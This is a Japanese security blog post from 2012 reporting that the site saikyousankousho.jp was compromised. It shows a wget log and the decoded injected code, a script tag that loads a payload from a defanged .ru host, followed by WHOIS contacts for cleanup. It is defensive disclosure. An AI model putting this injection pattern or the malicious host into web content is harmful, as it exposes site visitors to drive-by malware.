水曜日, 10月 17, 2012

#OCJP-077: saikyousankousho.jpサーバにマルウェア感染コードを発見!

下記のURLにマルウェアダウンロードコードを発見↓
hxxp://saikyousankousho.jp/005-mixi/003-sns
ダウンロード証拠↓
--21:44:45--  hxxp://saikyousankousho.jp/005-mixi/003-sns/
           => `index.html'
Reusing existing connection to saikyousankousho.jp:80.
HTTP request sent, awaiting response... 200 OK
Length: 8,130 (7.9K) [text/html]
21:44:45 (663.00 KB/s) - `index.html' saved [8130/8130]

上記のindex.htmlライン506からマルウェアコードを発見↓


解けたら下記のマルウェアダウンロードURLが出た↓
<div id=L4cvu32wjqje8>google-com-co.optmd.com.a</div>
<script src=
hxxp://google-com-co.optmd.com.adultfriendfinder-com.wavebank.ru:
8080/google.com/google.com/dailymotion.com/rakuten.co.jp/metroflog.com/></script>
片付けの為にドメイン連絡情報は↓
[Domain Name]                   SAIKYOUSANKOUSHO.JP
[登録者名]                      山田 太郎
[Registrant]                    yamada

[Name Server]                   uns01.lolipop.jp
[Name Server]                   uns02.lolipop.jp
[Signing Key]                   

[登録年月日]                    2007/07/11
[有効期限]                      2013/07/31
[状態]                          Active
[最終更新]                      2012/08/01 01:05:01 (JST)

Contact Information: [公開連絡窓口]
[名前]                          [代理公開情報]株式会社 paperboy&co.
[Name]                          paperboy&co.
[Email]                         admin@muumuu-domain.com
[Web Page]                      http://muumuu-domain.com/?mode=whois-policy
[郵便番号]                      810-0001
[住所]                          福岡県福岡市中央区天神2丁目7-21
                                Tenjin Prime 8F
[Postal Address]                Tenjin Prime 8F, 2-7-21, Tenjin
                                Chuo-ku, Fukuoka-City, Fukuoka
                                8100001,Japan
[電話番号]                      092-713-7999
[FAX番号]                       092-713-7944

0 件のコメント:

コメントを投稿